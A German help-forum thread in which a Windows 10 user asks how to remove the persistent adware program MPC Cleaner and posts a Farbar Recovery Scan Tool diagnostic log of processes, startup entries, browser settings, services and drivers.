Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen (https://www.trojaner-board.de/177980-windows-10-mpc-cleaner-laesst-richtig-entfernen.html)

StOony 19.04.2016 12:11
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen
 
Hallo liebe Helfer,

ich bin hier zum ersten mal und hoffe darauf Hilfe zu kriegen.
Mein Computer ist voller Malware, glaub ich zumindest.

Habe ein Programm namens MPC Cleaner der sich nicht entfernen lässt.

Zur Information was ich alles gemacht habe.

1: Anti Virus Programm laufen lassen
2: Adw Cleaner laufen lassen
3: Es in der Systemsteuerung unter Programme Deinstallieren gesucht, aber hab es nicht gefunden, weil es irgendwie nicht da ist.

Ich finde kein Ordner mit dem Namen MPC, nur ist es dauerhaft unten in meiner Leiste, da wo mein Avira und so auch ist, also die Programme die dauernd laufen(unten Rechts).

Ich kann nichtmal das Programm öffnen, es Startet immer mit, wenn ich mein PC anmache nur kriege ich es da nicht weg.

Habe einen WIN 10 Pro 64 Bit Systeme.

Wie gesagt bin zum ersten mal hier, werde jetzt meine Logs in Avira noch mit rein nehmen und dieses FRST

Danke jetzt schonmal :)

MFG StOony

PS: Bei Google Chrome ist die Seite MPC auch immer als Startseite, die kriege ich da auch nicht weg.

cosinus 19.04.2016 13:03
Hi und :hallo:

Logs bitte nicht anhängen, notfalls splitten und über mehrere Postings verteilt posten

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

StOony 19.04.2016 13:22
Ups, tut mir leid.
Kann es leider nicht mehr Editieren, poste es jetzt hier mit.

FRST:
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:18-04-2016
durchgeführt von Harun (Administrator) auf HARUN-PC (19-04-2016 13:05:47)
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Platform: Windows 10 Pro (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(DotC United Inc) A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(DotC United Inc) A:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(DotC United Inc) A:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avcenter.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\1\avgdiagex.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\1\avgdiagex.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-07-29] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [5006536 2016-04-04] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => A:\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [807392 2016-03-12] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66328 2016-01-27] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-04-05] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-04-05] (Raptr, Inc)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Steam] => "A:\Steam\steam.exe" -silent
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify Web Helper] => C:\Users\Harun\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [BingSvc] => C:\Users\Harun\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify] => C:\Users\Harun\AppData\Roaming\Spotify\Spotify.exe [6805616 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8813784 2016-03-11] (Piriform Ltd)
IFEO\playstv_launcher.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\raptrstub.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xfire2.bat [2016-04-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{f44a65a3-dc5f-4cc2-bb7a-f4d941196cd5}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-29] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-29] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: hxxp://www.yoursearching.com/newtab/?type=nt&ts=1457449062&z=c0daee2b39051a59099a9edgcz9wcm9z2z6t7eaqeo&from=face&uid=SAMSUNGXSSDX830XSeries_S0XXNEAC500477
FF DefaultSearchEngine: yessearches
FF SearchEngineOrder.3: Bing
FF SelectedSearchEngine: yessearches
FF Homepage: search.mpc.am
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-2630849102-760198568-3561441068-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Harun\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\user.js [2016-04-11]
FF user.js: detected! => C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js [2016-04-11]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [2016-04-19] [ist nicht signiert]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\bingsearch.full@microsoft.com [2015-09-24] [ist nicht signiert]
FF Extension: GsearchFinder - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924.xpi [2016-03-01]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\bingsearch.full@microsoft.com [2016-03-08] [ist nicht signiert]

Chrome:
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR StartupUrls: Default -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-08]
CHR Extension: (Adblock für Youtube™) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2016-03-05]
CHR Extension: (Google-Suche) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Google Docs Offline) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-15]
CHR Extension: (Sniper Team Game Collection) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-02-07]
CHR Extension: (Top Eleven) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2015-07-29]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Google Mail) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2016-04-03] (Advanced Micro Devices) [Datei ist nicht signiert]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [955736 2016-03-12] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [466504 2016-03-12] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [466504 2016-03-12] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1424880 2016-03-12] (Avira Operations GmbH & Co. KG)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [260456 2016-01-27] (Avira Operations GmbH & Co. KG)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S4 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
R2 MPCProtectService; A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [350688 2016-03-23] (DotC United Inc)
S4 Origin Client Service; A:\Origin\OriginClientService.exe [2007048 2015-08-01] (Electronic Arts)
S4 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-04-05] (Plays.tv, LLC)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2015-08-01] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76152 2015-08-02] ()
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4584208 2016-03-29] (AVG Technologies CZ, s.r.o.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [296648 2016-04-04] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [111120 2016-03-01] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-12] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-12] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2015-12-01] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-12] (Avira Operations GmbH & Co. KG)
S3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [194320 2016-04-12] (Intel Corporation)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-03-23] (DotC United Inc)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-03-29] (AVG Netherlands B.V.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [35880 2016-01-01] (Wellbia.com Co., Ltd.)
U3 idsvc; kein ImagePath
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S1 ttqbdlfv; \??\C:\WINDOWS\system32\drivers\ttqbdlfv.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; kein ImagePath
S3 XFDriver64; \??\C:\Program Files (x86)\Xfire2\XFDriver64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 13:05 - 2016-04-19 13:06 - 00018401 _____ C:\Users\Harun\Downloads\FRST.txt
2016-04-19 13:05 - 2016-04-19 13:05 - 00000000 ____D C:\FRST
2016-04-19 13:04 - 2016-04-19 13:05 - 02375680 _____ (Farbar) C:\Users\Harun\Downloads\FRST64.exe
2016-04-19 12:54 - 2016-04-19 12:54 - 00083140 _____ C:\Users\Harun\Desktop\Ereignisse.txt
2016-04-19 12:47 - 2016-04-19 12:47 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Harun\Downloads\Nicht bestätigt 326517.crdownload
2016-04-19 12:44 - 2016-04-19 12:44 - 00016148 _____ C:\WINDOWS\system32\HARUN-PC_Harun_HistoryPrediction.bin
2016-04-19 12:44 - 2016-04-19 12:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-04-19 12:39 - 2016-04-19 12:43 - 00000000 ____D C:\AdwCleaner
2016-04-19 12:39 - 2016-04-19 12:39 - 03683904 _____ C:\Users\Harun\Downloads\adwcleaner_5.112.exe
2016-04-19 12:39 - 2016-04-19 12:39 - 00001391 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files\iPod
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-15 17:10 - 2016-03-29 08:40 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-15 17:10 - 2016-03-29 08:40 - 01381376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-15 17:10 - 2016-03-25 09:38 - 24593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-15 17:10 - 2016-03-25 09:25 - 12505600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-15 17:10 - 2016-03-25 09:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-15 17:10 - 2016-03-25 09:13 - 19325440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-15 17:10 - 2016-03-25 08:55 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-15 17:10 - 2016-03-25 08:54 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 03467784 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 01022664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-15 17:10 - 2016-03-16 06:56 - 00861512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01299032 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-15 17:10 - 2016-03-16 06:55 - 01127024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 00601344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-15 17:10 - 2016-03-16 06:54 - 00595016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 22610328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 00801632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:46 - 00658568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-15 17:10 - 2016-03-16 06:45 - 00140536 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00208736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:39 - 00983904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-15 17:10 - 2016-03-16 06:37 - 01010016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-15 17:10 - 2016-03-16 06:21 - 01767000 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:21 - 01531888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 21088728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 00700256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:08 - 00151552 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-04-15 17:10 - 2016-03-16 06:06 - 00181088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:05 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:03 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
